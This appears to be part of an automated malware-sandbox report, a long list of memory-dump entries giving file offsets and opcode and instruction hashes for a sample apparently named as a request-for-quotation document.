                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: 07bfea6fab31944a4bda41c0758d6b1489649a0515c8e77b6d5e2ad6a6fc5d30
                                                                                            • Instruction ID: efe6b9363044209521758dcba7e75c0ab80cf325df6e9d321a7b6d151c171331
                                                                                            • Opcode Fuzzy Hash: 07bfea6fab31944a4bda41c0758d6b1489649a0515c8e77b6d5e2ad6a6fc5d30
                                                                                            • Instruction Fuzzy Hash: BB61DD30A2CA094FE75CEF0CD482A7173E0FB56344F5441B8D84ECB29BEE25F8928685
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c699b948c5b12baaf6fa002c9a2eca777089698ead7401532a9ec4f9ae0d6c84
                                                                                            • Instruction ID: 06a0ac1c322ff4239cd7ce0e46781cdebda10fe6c3994fd13f1fa81bfc4a63ed
                                                                                            • Opcode Fuzzy Hash: c699b948c5b12baaf6fa002c9a2eca777089698ead7401532a9ec4f9ae0d6c84
                                                                                            • Instruction Fuzzy Hash: 0F622770A0DA4A8FE7A8EB18D45567537E1FF96341F0441BDD88EC72D2EF28AC428785
                                                                                            Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 64370f99cde98e3f411ed2550ed80ca8273d2355cd3b6c9b316a2686bd6f9c4a
• Instruction ID: ffd48fad940a363c8d87a1f69dbf029516f6ee011e5a3d8e5ac09ca86a842b90
• Opcode Fuzzy Hash: 64370f99cde98e3f411ed2550ed80ca8273d2355cd3b6c9b316a2686bd6f9c4a
• Instruction Fuzzy Hash: 1142357295E7CA4FE357A7345C640A07FB1AF13650B5A41EBC0C9CB1E3EA1D684AC722
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39579885f515a15ab10930a3324d2c074bddc2d7a990979aa3fb8a6e47342e20
• Instruction ID: b8355f8b7ac57ccc213d874849203b349dd2d7c460cdea61df2a30f5d8739424
• Opcode Fuzzy Hash: 39579885f515a15ab10930a3324d2c074bddc2d7a990979aa3fb8a6e47342e20
• Instruction Fuzzy Hash: 36227A31E0EA4A4FE7A8FB2854552B537D1FF96351F1401BED44EC72D6FE18A806838A
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7cb9c64dc111849bd7b24f281897175d7b8e94feb1caa6b742e5359050708391
• Instruction ID: 02d643112cd14b6e90ef9f8a575be2d9e886785ed2b86f724bcc2ab9fef884b7
• Opcode Fuzzy Hash: 7cb9c64dc111849bd7b24f281897175d7b8e94feb1caa6b742e5359050708391
• Instruction Fuzzy Hash: B2122631E1D94A8FE798EB1C88557B9B7E1FF9A351F0441BAD04CC72C2EF2868498752
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7c506e89185ac777e0fa29d3e53be2b0492045f23bfb9f7e8026698876d9e405
• Instruction ID: db397bc021d5e55352e54bf9c9b851273602d3c5239344d3a91d2a4d3ac9d29e
• Opcode Fuzzy Hash: 7c506e89185ac777e0fa29d3e53be2b0492045f23bfb9f7e8026698876d9e405
• Instruction Fuzzy Hash: 94F13A31A0C98A4FE76CEB9C881657577D1FF983A0F5402BAD44DCB6D2DB386C0A8785
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc79f5920d92437687a62e4f9bd47b72d412ce20e59526acae158b6a1873c98b
• Instruction ID: bfde1c9e871cc5215c51dfa7e393dda5cba7409db1d572234b21e6843dbc1bf4
• Opcode Fuzzy Hash: dc79f5920d92437687a62e4f9bd47b72d412ce20e59526acae158b6a1873c98b
• Instruction Fuzzy Hash: 26E13631A1DA068FEB5CAB2884915B5B3E1FF9A351F2401BDD04FD75C6EE2CB8468784
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9706b5544ffc251648c972d811e9b2d22d3e34d5621467c9c56564c435fb19c9
• Instruction ID: f40e141ca9af0f1439ac167c0d89f19d6d1e8a485cab3ebfe0aaee67f227ed3f
• Opcode Fuzzy Hash: 9706b5544ffc251648c972d811e9b2d22d3e34d5621467c9c56564c435fb19c9
• Instruction Fuzzy Hash: 60E1693190CB8A4FE368EB2894455B577E1EF96350F1481BED88AC71D2FF28AC46C785
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f23110c19698ca9c4d076834f3550f04848923ffc883bc2b7b29eee09f8c0580
• Instruction ID: 42e828e76ca43846e74feceeabe5e649a98d30b15c3c5b9931feb7d83a655d69
• Opcode Fuzzy Hash: f23110c19698ca9c4d076834f3550f04848923ffc883bc2b7b29eee09f8c0580
• Instruction Fuzzy Hash: BAE12731E0D94A8FE7A8EB1888153A57BE1FF9A351F0441FAD44CC76D2EF286C0A8751
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb4a66f17a85ce9013906e47c9ac9f0d4a8ff01f6236004c42f15c1782236c72
• Instruction ID: c23d1ba23ebef1eb55786a23311e35a39d9f03b395d6a52ffde1f8b724a2d929
• Opcode Fuzzy Hash: fb4a66f17a85ce9013906e47c9ac9f0d4a8ff01f6236004c42f15c1782236c72
• Instruction Fuzzy Hash: FFD12730A1EA498FDB59EB28C895A7977E1FF56340F1401BDE48AC72D2EF24E802C755
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67f67d7921e4c0e21491ef2440639011cfb103c19088758ae5e49de29ec81d4f
• Instruction ID: 5cb9afbf0d0f6c45d8c7984a040a6c832845fc1d8bf87f7ec84d13b4db2bb364
• Opcode Fuzzy Hash: 67f67d7921e4c0e21491ef2440639011cfb103c19088758ae5e49de29ec81d4f
• Instruction Fuzzy Hash: 87D1C53490DA1E4FEB98EF18C441AA973E1FF5A354F1005B9D41AEB196EB74B846CB80
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da0a6cd16828b7eafde33bd9a355bf9acf0a602bfca11914402d9b3b262538cb
• Instruction ID: 8e789e0f800fba0f0d1b16f42945a479bf793e23b3a11e3375c148e762041b2c
• Opcode Fuzzy Hash: da0a6cd16828b7eafde33bd9a355bf9acf0a602bfca11914402d9b3b262538cb
• Instruction Fuzzy Hash: 4BB17971A0CA4A4FE368EB1C944167477E1EF96351F0481BAD88DC72D2FF28AC028785
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50122762c9582ebf8b6c59ca5291c199a4f410670fe4b7047103fcbc04237926
• Instruction ID: 099edda3d7dfad3dfca2640fee5b5af0006bbd379319d8da7b9976d466979f2c
• Opcode Fuzzy Hash: 50122762c9582ebf8b6c59ca5291c199a4f410670fe4b7047103fcbc04237926
• Instruction Fuzzy Hash: 25A17A31A1C7864FE31DD7299891171B7E2EFC7311F1486BED4C6C32D6EB28A8828745
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3394478a2f65630d8da1a37ed89628578cf2f5d6c5e704848d78017aae0a3f97
• Instruction ID: bd2a1b8c8be5b73999a9f24ae6715afa5e2d9615063fe980242b76a740fc7146
• Opcode Fuzzy Hash: 3394478a2f65630d8da1a37ed89628578cf2f5d6c5e704848d78017aae0a3f97
• Instruction Fuzzy Hash: FFA10E30A2CA458FE369EB2898415B1B7E0EF56740B9444BED48BC75D3EA29BC43C785
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 33c1d765888a4e104113fede71f82012dd4997f9b403db91e53e2f80fbaefcdd
• Instruction ID: b6cdc54d73966e8d7fa01e011b6eec94c2473277e374fd51f5b55a1d6b498f24
• Opcode Fuzzy Hash: 33c1d765888a4e104113fede71f82012dd4997f9b403db91e53e2f80fbaefcdd
• Instruction Fuzzy Hash: 71818B36E0DA5A4FE758FB2898101F93B91EF87395F0400BAD449DB1C3EE69B8468750
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 569d970359ed3ed5e56979f636161fba4f0c6331eb63c67c7aa150f4c33928c6
• Instruction ID: 52b66237ef557349b015ac28b50ac3783d289ace3f6b23bdd640d175e1500a4c
• Opcode Fuzzy Hash: 569d970359ed3ed5e56979f636161fba4f0c6331eb63c67c7aa150f4c33928c6
• Instruction Fuzzy Hash: 8B91A371D0DB8D8FEB49EB68C865AA87BF1FF56340F1400BAD049EB2D2DB286845C715
Memory Dump Source
• Source File: 00000000.00000002.2328380573.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848fd0000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e8eaf935d1c060b70b04493fb8758619a620cd7db65f4c5e24e9c6c59153d760
• Instruction ID: ff883ad70da738b3b82d7ea90a49425724b677c905b48d5a18b07b38403edaf2
• Opcode Fuzzy Hash: e8eaf935d1c060b70b04493fb8758619a620cd7db65f4c5e24e9c6c59153d760
• Instruction Fuzzy Hash: 0771363290DB898FE756EB2888655A5BBE0FF56340F0901FBC04AC72D3DF29A881C755
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: deef125381b08e09b0b25518386620ff26477205d9abba08b883b7d7fa484635
• Instruction ID: 96fe7598486c8bbef05acc266d1054eb81b4f19bac80ba6f6d9c862cce91bb6e
• Opcode Fuzzy Hash: deef125381b08e09b0b25518386620ff26477205d9abba08b883b7d7fa484635
• Instruction Fuzzy Hash: 7071EF31A0DD899FDB98EB1CD454AA9BBF1FF99350F0501AAD00DC7296DF28AC85CB41
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ccd7db764e3444e2d374cfc8a0e08d56ff36ea03164323f2ca38ea42b6ce0a97
• Instruction ID: d62bebd8f18e9e232c7991594b401576cf36749abec510c127f7d0ae1a1980d8
• Opcode Fuzzy Hash: ccd7db764e3444e2d374cfc8a0e08d56ff36ea03164323f2ca38ea42b6ce0a97
• Instruction Fuzzy Hash: E181E530A1CA0E8FDB49EF58C4905F9B7A1FF96350F104579D01AD72C6EB39A892CB90
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca17d5163b41dc96bb17dc6c1db10411221fe35396bf972c46f8e29810fe9631
• Instruction ID: 53131bda8bc58a0ca82325df4f114c32e018c88dd26fc2bf262ecda545a3ec36
• Opcode Fuzzy Hash: ca17d5163b41dc96bb17dc6c1db10411221fe35396bf972c46f8e29810fe9631
• Instruction Fuzzy Hash: 39710631E1DA865FE34AEB7844216A2BBE1FF61354F0446FAC04AC31C7EF2CA9098755
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3f9e357c1d42df6ea7766e8ed7f459358065a7067b2c8511451ec1be006c7db6
• Instruction ID: 5cb1d0d4bc6b8a3cee82e559c0b6aebe1b7acea76cb88b603e01532842acad61
• Opcode Fuzzy Hash: 3f9e357c1d42df6ea7766e8ed7f459358065a7067b2c8511451ec1be006c7db6
• Instruction Fuzzy Hash: 0971AD31A0DD499FDB98EB1CD455AA9BBF1FF99350F0401AAD00EC7296DF24AC85CB81
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f3cb94d0e7b482e9366df600b2c9bf3e6c7a8e57a35b189f06a98f7030d87b28
• Instruction ID: b2375b7f6edf3381b762c647e492b59c8721da4733505395f7618a4d761f17b2
• Opcode Fuzzy Hash: f3cb94d0e7b482e9366df600b2c9bf3e6c7a8e57a35b189f06a98f7030d87b28
• Instruction Fuzzy Hash: 5171113092CA458FE769EB2898415B1B7E0EF56740F9404BDD49FC75D2EE29BC03CA85
Memory Dump Source
• Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
Similarity
• API ID:
• String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbd59fa8c924aa76f9a714952025d9fc169a07064cfeea2379eed4a92dd77cdb
                                                                                            • Instruction ID: 04205bad424de8c143426af3d2b609984b11024ae9c4e67ab9891c1987bbd1c0
                                                                                            • Opcode Fuzzy Hash: cbd59fa8c924aa76f9a714952025d9fc169a07064cfeea2379eed4a92dd77cdb
                                                                                            • Instruction Fuzzy Hash: D051283061EB894FD359E72C8451176BBE1EF86751F4406BEE48BC32C6EE29A842C395
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07391244ce05a1875e9e2b163342be6cf8447ec49a0398f28507c825ac38ad61
                                                                                            • Instruction ID: 2a75d33ab563de1a5d23266d6881641024f8d8155cdd43f5e34381e60261c77e
                                                                                            • Opcode Fuzzy Hash: 07391244ce05a1875e9e2b163342be6cf8447ec49a0398f28507c825ac38ad61
                                                                                            • Instruction Fuzzy Hash: BF51D130A0CD1E8FEB94EB2C94686B97BE1FF5A341F1501AAD40DC72E2DF24AC408784
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 51911fa5b9b2c1badfcdf9bb9c7042be2cdd295dcd2af9ca2e0a86ae6a0cbb05
                                                                                            • Instruction ID: 1033e32693b0b73e474338fa17efc28cc9b4413772b5f6011d8b8da21a61a105
                                                                                            • Opcode Fuzzy Hash: 51911fa5b9b2c1badfcdf9bb9c7042be2cdd295dcd2af9ca2e0a86ae6a0cbb05
                                                                                            • Instruction Fuzzy Hash: 7F616C31D19A4D8FEB94EF688855BADBBF1FF59341F5401BAC00DD7282DE3868858B11
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff78c7bc4815131f6fd999466f5b97af517f312f7cd1088becdaf875438b705
                                                                                            • Instruction ID: 476c78324e2b97d4b88db345f94fd79009e2377ed0e764dd9c1f3eb1b57abff1
                                                                                            • Opcode Fuzzy Hash: aff78c7bc4815131f6fd999466f5b97af517f312f7cd1088becdaf875438b705
                                                                                            • Instruction Fuzzy Hash: 7151E572A0D7D50FD31AA7785C550A17FA1DB87220B0982FBD4C6CB1A7E519AC0B83A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8851ee4b4660f045b2650a42f2a8d503d22cacb0d10dee31a3b6978e874682ac
                                                                                            • Instruction ID: 6bc0859db133573e05c3743effb8e7ba14e6b5593d99e947eada817502887485
                                                                                            • Opcode Fuzzy Hash: 8851ee4b4660f045b2650a42f2a8d503d22cacb0d10dee31a3b6978e874682ac
                                                                                            • Instruction Fuzzy Hash: 46512631E1C9465FE399FB2858565B973E1FFA1390F04017AE41EC31C7FE1C68468286
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f36007ff54d4694704023927d56867a5e503d66671d3c2915a4033a8f68cf787
                                                                                            • Instruction ID: f7c7136b6a1f72450062fe0728d7cdefa4c37a66137904a5274ebc1e970b7c80
                                                                                            • Opcode Fuzzy Hash: f36007ff54d4694704023927d56867a5e503d66671d3c2915a4033a8f68cf787
                                                                                            • Instruction Fuzzy Hash: 7951B33190DA5D8FDB85EF68C464AA97BF1FF6A341F0900AAD009D72E2CB35AC40C791
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 59dd7c465de83843d55ceb5bef88d82d81eea59f1386c146ad390b473497a6e9
                                                                                            • Instruction ID: 50201765efa19fb6d193fbd5c37f22f7cef8b105ce235513ed84898f6af795c6
                                                                                            • Opcode Fuzzy Hash: 59dd7c465de83843d55ceb5bef88d82d81eea59f1386c146ad390b473497a6e9
                                                                                            • Instruction Fuzzy Hash: A451F831A0E9199FEB49FB6888556B977E1FF9A381F0401BAD00DC72D2DF38A8458751
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 55bb1e1d2c94f38378b9de2626d949024aa3e6a51eb036852786f135d86c86ae
                                                                                            • Instruction ID: dd76f5b76b1a3baf2788bfcc7875e647bd8f89f24ffe2adaac9d781f64253cde
                                                                                            • Opcode Fuzzy Hash: 55bb1e1d2c94f38378b9de2626d949024aa3e6a51eb036852786f135d86c86ae
                                                                                            • Instruction Fuzzy Hash: 9941E731B0D91A9FEB89FB6888556B977E2FF9A381F000179D00DC72D6DF38A8458751
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0944a8d14a211035b1823a3ef6781d5be17099be1704b4bc702bf9c36eabdbfe
                                                                                            • Instruction ID: f3e049424ed0abb6e2d6e25254a07d1370e7053ffe5ed3e9cc832ca30f66e974
                                                                                            • Opcode Fuzzy Hash: 0944a8d14a211035b1823a3ef6781d5be17099be1704b4bc702bf9c36eabdbfe
                                                                                            • Instruction Fuzzy Hash: 6B419E31D0DA4D9FEB58EF18D855AF97BE1FF5A340F04016AE40AC7292DF28AC458B45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d437721e53918312b9de8f3ba6c738e258f11e0a28f5e118062d6881f67cda04
                                                                                            • Instruction ID: 19b4e18752ac95b445df0ec2ef6ab1f1a4011ed092948d7d0005f581274457dd
                                                                                            • Opcode Fuzzy Hash: d437721e53918312b9de8f3ba6c738e258f11e0a28f5e118062d6881f67cda04
                                                                                            • Instruction Fuzzy Hash: A7414C31A0991D8FDF84EF58C464AA97BF1FF6D351F1501AAD40AD72A1CB35AD80CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f240454117bb4dd2c73286bdf4eb775edea2be8d576696c8c2bd3ae004afb1f0
                                                                                            • Instruction ID: 0a3469bb6b43ab89fbb801d856fba91d7cabf74153757bba463e160afc0f3269
                                                                                            • Opcode Fuzzy Hash: f240454117bb4dd2c73286bdf4eb775edea2be8d576696c8c2bd3ae004afb1f0
                                                                                            • Instruction Fuzzy Hash: 2C41F031E2DA1A8FE798AB6894652FDBBF1EF45390F8401BAD009C32D2DF285C049B54
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80eff078d7c7e5da5ffe64c32cbde96107ae4517c98970113d6f8bde265f5488
                                                                                            • Instruction ID: 6fa99c2335d64fee6ec34d1a3dc14ed83209c99d3e2769b0067fdb0b20b897c8
                                                                                            • Opcode Fuzzy Hash: 80eff078d7c7e5da5ffe64c32cbde96107ae4517c98970113d6f8bde265f5488
                                                                                            • Instruction Fuzzy Hash: C941B470A0CB4A4FD758DB188455579B7E2FBD6301F14867ED0CAC32E5EB34E8818786
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8a1110624b7794e8b508c8b9d13d963f524956fd129a1ecab397396b26a3c334
                                                                                            • Instruction ID: c14da5ac6ae4a3d6e7f30331028eac8c0bc87cfe33f5915dd5894be81fe3c0c5
